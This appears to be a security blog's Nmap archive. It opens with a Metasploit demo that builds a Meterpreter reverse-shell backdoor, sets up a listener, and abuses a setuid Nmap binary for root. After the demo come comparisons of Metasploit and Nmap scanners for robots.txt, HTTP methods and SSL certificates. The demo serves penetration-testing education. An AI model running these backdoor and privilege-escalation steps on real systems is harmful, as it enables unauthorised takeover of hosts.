Category Archives: Nmap

Nmap (“Network Mapper”) is a free and open source (license) utility for network exploration or security auditing. Many systems and network administrators also find it useful for tasks such as network inventory, managing service upgrade schedules, and monitoring host or service uptime. Nmap uses raw IP packets in novel ways to determine what hosts are available on the network, what services (application name and version) those hosts are offering, what operating systems (and OS versions) they are running, what type of packet filters/firewalls are in use, and dozens of other characteristics. It was designed to rapidly scan large networks, but works fine against single hosts. Nmap runs on all major computer operating systems, and official binary packages are avalable for Linux, Windows, and Mac OS X. In addition to the classic command-line Nmap executable, the Nmap suite includes an advanced GUI and results viewer (Zenmap), a flexible data transfer, redirection, and debugging tool (Ncat), and a utility for comparing scan results (Ndiff).

Setuid Nmap Exploit Metasploit Demo

Timeline :

Metasploit PoC provided the 2012-06-13

PoC provided by :

egypt

Reference(s) :

None

Affected version(s) :

All Nmap versions with setuid

Tested on CentOS release 6.2 with :

Nmap 6.01

Description :

Nmap’s man page mentions that “Nmap should never be installed with special privileges (e.g. suid root) for security reasons..” and specifically avoids making any of its binaries setuid during installation. Nevertheless, administrators sometimes feel the need to do insecure things. This module abuses a setuid nmap binary by writing out a lua nse script containing a call to os.execute(). Note that modern interpreters will refuse to run scripts on the command line when EUID != UID, so the cmd/unix/reverse_{perl,ruby} payloads will most likely not work.

Commands :

You will require to have an active session on the target, this session could be done  through a backdoor.

sudo msfpayload linux/x86/meterpreter/reverse_tcp  LHOST=192.168.178.100 X > backdoor

Upload the backdoor on the target

use exploit/multi/handler
set PAYLOAD linux/x86/meterpreter/reverse_tcp
set LHOST 192.168.178.100
exploit -j

sysinfo
getuid

use exploit/unix/local/setuid_nmap
set Nmap /usr/local/bin/nmap
set SESSION 1
set TARGET 1
set PAYLOAD linux/x86/meterpreter/reverse_tcp
set LHOST 192.168.178.100
exploit

sysinfo
getuid

Robots.txt scanning differences between Metasploit and Nmap

Metasploit has auxiliary scanner dedicated to robots.txt files. I was interest to compare this Metasploit auxiliary scanner with Nmap robots.txt NSE script.

I decided to scan a /19 rang, how represent 8192 IP addresses with the 2 tools, compare the results and the time to do these scans.

Metasploit

By default, the Metasploit “scanner/http/robots_txt” auxiliary scanner is configured with 50 threads, you can if you want increase the number of thread  by setting the THREADS option, we have set THREADS to 256.

Metasploit, between the console, has take around 40 seconds to scan all the 8192 IP addresses, and return us 41 responses.

Example of output :

[*] [xxx.xxx.xxx.xxx] /robots.txt found
[*] [xxx.xxx.xxx.xxx] /robots.txt – /database/, /includes/, /misc/, /modules/, /sites/, /themes/, /scripts/, /updates/, /profiles/, /xmlrpc.php, /cron.php, /update.php, /install.php, /INSTALL.txt, /INSTALL.mysql.txt, /INSTALL.pgsql.txt, /CHANGELOG.txt, /MAINTAINERS.txt, /LICENSE.txt, /UPGRADE.txt, /admin/, /comment/reply/, /contact/, /logout/, /node/add/, /search/, /user/register/, /user/password/, /user/login/, /?q=admin/, /?q=comment/reply/, /?q=contact/, /?q=logout/, /?q=node/add/, /?q=search/, /?q=user/password/, /?q=user/register/, /?q=user/login/

Nmap

With Nmap, the following command will permit you to scan the robots.txt files.

time sudo nmap –script=robots.txt -p80 -PN -T4 -oN xxx.xxx.xxx.xxx_19.txt xxx.xxx.xxx.0/19

Nmap has take around 11 minutes to scan all the 8192 IP addresses, and return us 38 responses.

Example of output :

Nmap scan report for toto.sploit.com (xxx.xxx.xxx.xxx)
Host is up (0.040s latency).
PORT   STATE SERVICE
80/tcp open  http
| robots.txt: has 38 disallowed entries (15 shown)
| /database/ /includes/ /misc/ /modules/ /sites/ /themes/
| /scripts/ /updates/ /profiles/ /xmlrpc.php /cron.php /update.php
|_/install.php /INSTALL.txt /INSTALL.mysql.txt

Depending on the verbosity you give to Nmap, the complete robots.txt disallowed entries will be displayed.

In first manner we can think that Metasploit is faster than Nmap to parse all the robots.txt files. Metasploit has discover 41 robots.txt files and Nmap 38. If you take a look on the following matrices, you will see that a total of 44 robots.txt files where discovered. So 3 missed by Metasploit and 6 missed by Nmap. These missed robots.txt files are not the same between the 2 tools in most cases.

A missed robots.txt file is identified as 0 in the file, the finded one with 1. The “robots.txt” column represent the tests with a basic web browser, 1 for existing files, 0 for non existing, or accessible files.

We have case A, how is all the time missed by Nmap only. The following robots.txt entries are missed.

User-agent: *
Disallow:

An robots.txt file exist, but cause the Disallow directive don’t contain any entries, the NSE script is not matching.

We have case C, how is missed by Nmap only :

User-agent: *
Disallow: /

This case is look like case B, but Metasploit find it.

Finally we have case X, how are detected by Nmap, not detected by Metasploit, but also not accessible by a traditional web browser or wget command line. A 404 apache error code is in return but Nmap return some robots.txt entries.

HTTP Methods scanning differences between Metasploit and Nmap

Metasploit has auxiliary modules dedicated to scan HTTP methods. I was interest to compare this Metasploit module with Nmap http-methods NSE script.

I decided to scan a /24 rang, how represent 255 IP addresses with the 2 tools, compare the results and the time to do these scans.

Metasploit

By default, the Metasploit “scanner/http/options” auxiliary module is configured with 50 threads, you can if you want increase the number of thread  by setting the THREADS option, we have set THREADS to 256.

Cli testing

time sudo msfcli scanner/http/options THREADS=256 RHOSTS=xxx.xxx.xxx.xxx/24 E

Metasploit, between the cli, has take around 21 seconds to scan all the 255 IP addresses, and return us 7 responses.

Console testing

Metasploit, between the console, has take around 13 seconds to scan all the 255 IP addresses, and return us 7 responses, the same as the cli.

Example of output :

[*] xxx.xxx.xxx.xxx allows GET,HEAD,POST,OPTIONS,TRACE methods
[*] xxx.xxx.xxx.xxx allows GET,HEAD,POST,OPTIONS,TRACE methods
[*] xxx.xxx.xxx.xxx allows OPTIONS, TRACE, GET, HEAD methods
[*] xxx.xxx.xxx.xxx allows OPTIONS, TRACE, GET, HEAD methods
[*] xxx.xxx.xxx.xxx allows GET,HEAD,POST,OPTIONS,TRACE methods
[*] xxx.xxx.xxx.xxx allows OPTIONS,GET,HEAD,POST,DELETE,TRACE,PROPFIND,PROPPATCH,COPY,MOVE,LOCK,UNLOCK methods
[*] xxx.xxx.xxx.xxx allows OPTIONS, TRACE, GET, HEAD, POST methods

Nmap

With Nmap, the following command will permit you to scan the HTTP methods.

time sudo nmap –script=http-methods -PN -T4 -p 80 -oN xxx.xxx.xxx.0-255_http_methods.txt xxx.xxx.xxx.0/24

Nmap has take around 11 seconds to scan all the 255 IP addresses, and return us 7 responses. The 7 responses are the same as the Metasploit one, with the same available methods detected.

Example of output :

Nmap scan report for toto.sploit.com (xxx.xxx.xxx.xxx)
Host is up (0.11s latency).
PORT   STATE SERVICE
80/tcp open  http
| http-methods: OPTIONS GET HEAD POST DELETE TRACE PROPFIND PROPPATCH COPY MOVE LOCK UNLOCK
| Potentially risky methods: DELETE TRACE PROPFIND PROPPATCH COPY MOVE LOCK UNLOCK
|_See http://nmap.org/nsedoc/scripts/http-methods.html

In term of time of execution, Metasploit console and Nmap are equivalent, but in term of result the fact that the Nmap NSE script give references on the potential risky methods is nice advanced information included by default.

HTTPS cert scanning differences between Metasploit and Nmap

Metasploit has auxiliary modules dedicated to HTTPS cert and SSL scanning. I was interest to compare this Metasploit module with Nmap ssl-cert NSE script.

I decided to scan a /24 rang, how represent 255 IP addresses with the 2 tools, compare the results and the time to do these scans.

Metasploit

By default, the Metasploit “scanner/http/cert auxiliary” module is configured with 50 threads, you can if you want increase the number of thread  by setting the THREADS option. We have set THREADS to 256. We have also decrease the ConnectTimeout advanced configuration option to 1 second, and set the SHOWALL option to true in order to get issuers and times.

Metasploit suggest to use this auxiliary module in the console than with the cli.

Cli testing

time sudo msfcli scanner/http/cert ConnectTimeout=1 SHOWALL=true THREADS=256 RHOSTS=xxx.xxx.xxx.xxx/24 E

Metasploit, between the cli, has take around 14 seconds to scan all the 255 IP addresses, and return us 9 responses.

Console testing

Metasploit, between the console, has take around 5 seconds to scan all the 255 IP addresses, and return us 9 responses.

Example of output :

[+] xxx.xxx.xxx.xxx – ‘toto.sploit.com’ : /C=US/ST=UT/L=Salt Lake City/O=The USERTRUST Network/OU=http://www.usertrust.com/CN=UTN-USERFirst-Hardware
[-] xxx.xxx.xxx.xxx – ‘toto.sploit.com’ : ‘Sat Jan 01 00:00:00 UTC 2000’ – ‘Sat Jan 01 00:00:00 UTC 2000′ (EXPIRED)’

With the console, or the cli, we have some strange behaviors on certificates times how should, normally, announce if the certificate is expired or not, all the 9 certificates are expired with this kind of output : ‘Sat Jan 01 00:00:00 UTC 2000′ – ‘Sat Jan 01 00:00:00 UTC 2000’ (EXPIRED)‘.

By switching the SSLVersion advanced option from SSL3 to SSL2, I discovered one more certificate. So Metasploit cert scanner discover a total of 10 certificates on 11.

Nmap

With Nmap, the following command will permit you to scan the https cert. The amount of information printed about the certificate depends on the verbosity level. With no extra verbosity, the script prints the validity period and the commonName, organizationName, stateOrProvinceName, and countryName of the subject.

time sudo nmap –script=ssl-cert -PN -T4 -p 443 -oN xxx.xxx.xxx.xxx-255_ssl_cert.txt xxx.xxx.xxx.xxx/24

Nmap has take around 11 seconds to scan all the 255 IP addresses, and return us only 11 responses.

Example of output :

Nmap scan report for toto.sploit.com (xxx.xxx.xxx.xxx)
Host is up (0.14s latency).
PORT    STATE SERVICE
443/tcp open  https
| ssl-cert: Subject: commonName=toto.sploit.com/organizationName=Sploit Inc./stateOrProvinceName=Luna/countryName=EU
| Issuer: commonName=UTN-USERFirst-Hardware/organizationName=The USERTRUST Network/stateOrProvinceName=UT/countryName=US
| Not valid before: 2007-10-22 00:00:00
| Not valid after:  2010-10-21 23:59:59
| MD5:   661a 63d2 1554 e5cc 250c 8991 ae34 56ce
|_SHA-1: e3e9 1fc1 6843 3b9b d686 e9ea fec2 6c2b ac01 afa3

There is surely a bug in the Metasploit auxiliary module on the certification expiration check.

A single Nmap NSE script, provide you more information’s on the certificate (MD5, cipher and details of the ssl-cert). In order to have the same information’s with Metasploit you need to execute another auxiliary module “scanner/http/ssl“. This other module will also scan the 255 IP addresses in around 5 seconds, but will still return 10 responses. They’re is still a missing certificate how is an SSL3 version.

With Nmap NSE script you don’t have to switch between the SSL versions to discover all the SSL certs.

Update : The Metasploit cert auxiliary scanner module times has been corrected and now the cert times informations are effectives, but still discover 10 certificates on 11.